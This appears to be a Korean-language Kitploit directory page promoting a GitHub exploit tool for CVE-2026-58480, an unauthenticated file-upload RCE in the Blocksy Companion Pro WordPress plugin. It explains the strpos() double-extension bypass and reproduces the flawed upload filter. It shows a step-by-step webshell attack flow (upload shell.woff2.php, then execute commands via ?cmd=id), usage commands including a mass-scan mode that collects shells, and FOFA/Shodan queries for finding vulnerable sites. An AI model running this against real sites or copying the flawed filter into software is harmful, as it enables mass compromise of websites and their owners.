Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-58480 — CVE-2026-58480 / CVE-2026-15158 — Blocksy Companion Pro < 2.1.47의 비인증 RCE (30만+ 설치). 이중 확장자 우회를 통한 인증 전 임의 파일 업로드. | Kitploit
도구/GitHubGitHub/shinthink/cve-2026-58480
ReconnaissancePayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubshinthink/cve-2026-58480

CVE-2026-58480

CVE-2026-58480 / CVE-2026-15158 — Blocksy Companion Pro < 2.1.47의 비인증 RCE (30만+ 설치). 이중 확장자 우회를 통한 인증 전 임의 파일 업로드.

저장소 보기
325일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-58480 — Blocksy Companion Pro 인증되지 않은 파일 업로드 RCE

Advanced Reviews → save_attachments → Custom Fonts strpos() 우회 → shell.woff2.php


개요

CVE-2026-58480(또한 CVE-2026-15158로 추적됨)은 Blocksy WordPress 테마의 프리미엄 애드온인 Blocksy Companion Pro < 2.1.47에서 발생하는 치명적인(CVSS 9.8) 인증되지 않은 임의 파일 업로드 취약점입니다(활성 설치 30만 개 이상).

Advanced Reviews 기능(WooCommerce Extra의 일부)의 save_attachments AJAX 핸들러는 인증 없이 파일 업로드를 허용합니다. Custom Fonts 확장 기능은 실제 파일 확장자가 아닌 .woff2 / .ttf에 대한 strpos() 부분 문자열 검사를 통해 업로드를 검증합니다. 공격자는 shell.woff2.php와 같은 이중 확장자 파일명으로 이를 우회합니다. .woff2가 부분 문자열 검사를 통과하고 .php가 서버에서 실행됩니다.

영향을 받는 버전

버전상태
< 2.1.47취약
2.1.47+패치됨

요구 사항: WooCommerce Extra(Advanced Reviews) 및 Custom Fonts 확장 기능이 활성화된 프리미엄 라이선스. 무료 blocksy-companion 플러그인에는 취약한 코드 경로가 포함되어 있지 않습니다.


취약점 메커니즘

근본 원인

Custom Fonts 확장 기능은 PATHINFO_EXTENSION을 통한 실제 파일 확장자 확인 대신 strpos()(부분 문자열 일치)를 사용하여 파일명을 검증하는 wp_check_filetype_and_ext 필터를 등록합니다:

root@kitploit:~
// framework/premium/extensions/custom-fonts/extension.php#L137 (reconstructed)
add_filter('wp_check_filetype_and_ext', function($data, $file, $filename, $mimes, $real_mime) {
    if (strpos($filename, '.woff2') !== false || 
        strpos($filename, '.ttf') !== false) {
        $data['ext'] = 'woff2';
        $data['type'] = 'font/woff2';
    }
    return $data;
}, 10, 5);

Advanced Reviews의 save_attachments 함수는 표준 WordPress 업로드 처리를 호출하며, 이 처리가 해당 필터를 호출합니다. shell.woff2.php라는 파일은 .woff2가 부분 문자열로 존재하기 때문에 통과합니다. 필터는 이것이 최종 확장자인지 확인하지 않습니다.

공격 흐름

root@kitploit:~
POST /wp-admin/admin-ajax.php
  action=blc_save_review_attachments
  blc-review-images[] = shell.woff2.php (multipart, PHP payload)
→ wp_check_filetype_and_ext filter: ".woff2" found → approved
→ File saved to wp-content/uploads/YYYY/MM/shell.woff2.php
→ GET /wp-content/uploads/YYYY/MM/shell.woff2.php?cmd=id
→ RCE as www-data

소스 코드 위치

파일 (Trac)라인용도
framework/premium/extensions/custom-fonts/extension.php137strpos() 검증 필터
framework/premium/extensions/woocommerce-extra/features/advanced-reviews/feature.php811save_attachments 핸들러

설치

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-58480.git
cd CVE-2026-58480
pip install requests

사용법

root@kitploit:~
# 대상 핑거프린팅
python exploit.py -u https://target.com --check

# 전체 익스플로잇
python exploit.py -u https://target.com

# 대량 스캔
python exploit.py -f targets.txt -o shells.txt

FOFA / Shodan

root@kitploit:~
FOFA:   body="/wp-content/themes/blocksy/"
Shodan: http.html:"blocksy-companion"

참고 자료

  • NVD CVE-2026-58480
  • OpenCVE CVE-2026-15158 — 매개변수 blc-review-images[]
  • FreshySites 기술 분석 — wp_check_filetype_and_ext 필터
  • Wordfence 권고
  • SecurityPointBreak
  • VulnCheck 권고
  • WordPress Trac — Custom Fonts
  • WordPress Trac — Advanced Reviews

면책 조항

이 익스플로잇은 교육 및 승인된 보안 연구 목적으로만 제공됩니다. 소유자의 명시적 허가 없이 시스템을 대상으로 사용하지 마십시오.

도구 다운로드